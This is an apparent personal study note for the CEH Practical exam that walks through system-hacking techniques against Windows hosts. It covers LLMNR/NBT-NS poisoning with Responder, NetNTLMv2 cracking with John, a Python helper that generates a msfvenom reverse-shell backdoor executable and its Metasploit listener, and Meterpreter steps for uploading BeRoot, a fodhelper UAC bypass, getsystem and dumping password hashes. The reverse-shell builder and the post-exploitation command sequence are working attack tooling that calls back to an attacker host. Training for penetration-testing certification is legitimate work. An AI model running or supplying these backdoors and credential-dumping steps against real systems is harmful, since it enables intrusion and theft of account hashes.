System Hacking
Welcome to the System Hacking module. This note walks through the methodologies I used while preparing for the CEH (Practical) exam.
Introduction
System hacking is the compromise of computer systems and the software running on them in order to access the target machine and steal or misuse the sensitive information it holds. The attacker, or the malware they deploy, identifies and exploits a vulnerability or misconfiguration in the system to gain unauthorised access.
Steps involved in System Hacking
Gaining Access
Escalating Privileges
Maintaining Access
Clearing Logs
NTLM
Windows New Technology LAN Manager (NTLM) is a suite of challenge-response authentication protocols from Microsoft used to authenticate users and to protect the integrity and confidentiality of their sessions. Because the server's challenge and the client's hashed response travel over the network, anyone who can get a host to authenticate to them (the poisoning attack below) can capture a NetNTLMv2 challenge/response pair and crack it offline. Note that such a captured response is not the NT hash itself: it cannot be used for pass-the-hash, it has to be cracked against a wordlist.
Responder
Responder is an LLMNR, NBT-NS and mDNS poisoner: it answers name-resolution broadcasts that no legitimate host answered, so the victim connects to the attacker and authenticates, handing over a NetNTLMv2 challenge/response. It answers specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default the tool only responds to File Server Service requests (NetBIOS suffix <20>), which are for SMB.
The idea is to target our answers and stay stealthier on the network; it also avoids breaking legitimate NBT-NS behaviour. Set the -r option on the command line if you also want to answer Workstation Service requests for a name suffix. Run it against the interface that faces the victims (for example "responder -I eth0") and collect the captured NetNTLMv2 responses from Responder's logs directory; they are written in the format that John the Ripper and hashcat expect.
Cracking NTLM Hash using John-The-Ripper
John the Ripper is a free, open-source password cracking and security auditing tool available for most operating systems. It does not recover a password from a hash directly: it takes candidate passwords from a wordlist, from mangling rules or from its incremental (brute-force) mode, hashes each candidate with the same algorithm as the captured hash and reports a match. The NetNTLMv2 responses captured by Responder are cracked with the netntlmv2 format ("john --format=netntlmv2 --wordlist=rockyou.txt captured.txt"), and "john --show --format=netntlmv2 captured.txt" prints the cracked results afterwards.
Backdoor Using Metasploit
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.
Crafting Windows executable through MSFVenom
Setting up reverse listener using msfconsole
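The two steps above (building the executable with MSFVenom and starting the listener with msfconsole) as an added example. This is my own helper script, not part of these notes or of Metasploit: it builds the msfvenom command line for a Windows reverse-TCP Meterpreter executable and writes the matching msfconsole resource file for exploit/multi/handler. The attacker address 10.10.14.5, port 4444 and the file names are assumed values; msfvenom is only executed when it is on PATH.

```python
# Added example (not part of the original notes or of Metasploit): build the
# msfvenom command for a Windows reverse-TCP Meterpreter executable and a
# matching msfconsole resource file for the listener. LHOST/LPORT/file names
# are assumed values; msfvenom is only executed if it is on PATH.
import ipaddress
import shutil
import subprocess
from pathlib import Path

PAYLOAD = "windows/meterpreter/reverse_tcp"   # 32-bit; windows/x64/... for x64 targets


def is_valid_endpoint(lhost: str, lport: int) -> bool:
    """Reject garbage before it reaches msfvenom, which fails late and unhelpfully."""
    try:
        ipaddress.ip_address(lhost)
    except ValueError:
        return False
    return 1 <= lport <= 65535


def msfvenom_argv(lhost: str, lport: int, out_file: str,
                  payload: str = PAYLOAD, arch: str = "x86") -> list:
    """argv for msfvenom: -p payload, LHOST/LPORT as payload options,
    -a/--platform for the target, -f exe for a PE, -o for the output path."""
    if not is_valid_endpoint(lhost, lport):
        raise ValueError(f"bad listener endpoint {lhost}:{lport}")
    return ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
            "-a", arch, "--platform", "windows", "-f", "exe", "-o", out_file]


def handler_rc(lhost: str, lport: int, payload: str = PAYLOAD) -> str:
    """msfconsole resource script for exploit/multi/handler. PAYLOAD, LHOST
    and LPORT must match what the executable was built with."""
    if not is_valid_endpoint(lhost, lport):
        raise ValueError(f"bad listener endpoint {lhost}:{lport}")
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",   # keep listening after the first callback
        "exploit -j -z",             # background job, do not auto-interact
        "",
    ])


def write_handler_rc(path: str, lhost: str, lport: int, payload: str = PAYLOAD) -> Path:
    rc = Path(path)
    rc.write_text(handler_rc(lhost, lport, payload))
    return rc


def build_backdoor(lhost: str, lport: int, out_file: str = "backdoor.exe",
                   rc_file: str = "handler.rc") -> tuple:
    """Generate the executable (when msfvenom exists) and the handler script."""
    argv = msfvenom_argv(lhost, lport, out_file)
    rc = write_handler_rc(rc_file, lhost, lport)
    if shutil.which("msfvenom"):
        subprocess.run(argv, check=True)
    else:
        print("msfvenom not on PATH; would run:", " ".join(argv))
    print(f"start the listener before delivering {out_file}: msfconsole -q -r {rc}")
    return argv, rc


if __name__ == "__main__":
    build_backdoor("10.10.14.5", 4444)   # assumed attacker IP and port
```

Start the handler ("msfconsole -q -r handler.rc") before the executable runs on the target, otherwise the connect-back is lost. The 32-bit payload runs on 64-bit Windows as well, but if you need a native x64 Meterpreter switch both the payload and the "-a x64" architecture consistently on both sides. Expect an unmodified msfvenom executable to be flagged by current antivirus; that is a separate problem from getting the handler right.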
PowerSploit
PowerSploit is a collection of Microsoft PowerShell modules that aid penetration testers during all phases of an assessment. Its modules and scripts cover code execution, script modification, persistence, antivirus bypass, exfiltration, privilege escalation (PowerUp) and reconnaissance (PowerView).
Must Read this tutorial
Armitage
Armitage is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.
Hacking Microsoft office with Macro
Privesc Windows Machine using BeRoot
BeRoot is a post-exploitation tool that checks a host for common misconfigurations that could let us escalate our privileges. It has been added to the pupy project as a post-exploitation module, so there it runs in memory without touching the disk. The tool performs no exploitation itself, and its goal is not a full configuration assessment of the host (listing every service, process and network connection); it prints only the findings that are a potential path to privilege escalation, which you then exploit by hand or with the matching Metasploit local exploit.
Steps you can replicate
Upload BeRoot.exe to the target through the existing reverse shell (in Meterpreter: "upload BeRoot.exe C:\\Windows\\Temp\\"). The binary is commonly flagged by antivirus, so check that it survived on disk.
Drop into a Windows command shell with "shell", run BeRoot.exe and read the misconfigurations it reports (writable service binaries, unquoted service paths, AlwaysInstallElevated and similar).
Run "post/windows/gather/smart_hashdump" ("run post/windows/gather/smart_hashdump" from the session). It needs SYSTEM privileges to read the SAM, so if it fails on a low-privilege session, escalate first with the steps below and run it again.
To get SYSTEM, check who you are with "getuid" and try "getsystem -t 1" (named-pipe impersonation). If it reports failure, the session is usually running as a local administrator but at medium integrity because of UAC, so follow the next step.
Let's try another exploit: background the session, "use exploit/windows/local/bypassuac_fodhelper", "set SESSION <id>" (and LHOST/LPORT for the new payload), then "exploit". The fodhelper bypass only works when the session user is a member of the local Administrators group and UAC is at its default level; it returns a new, high-integrity session.
In the new session run "getuid", then "getsystem -t 1", then "getuid" again to confirm you are NT AUTHORITY\SYSTEM.
Run "post/windows/gather/smart_hashdump" again to dump the local account hashes.
Other Methodology: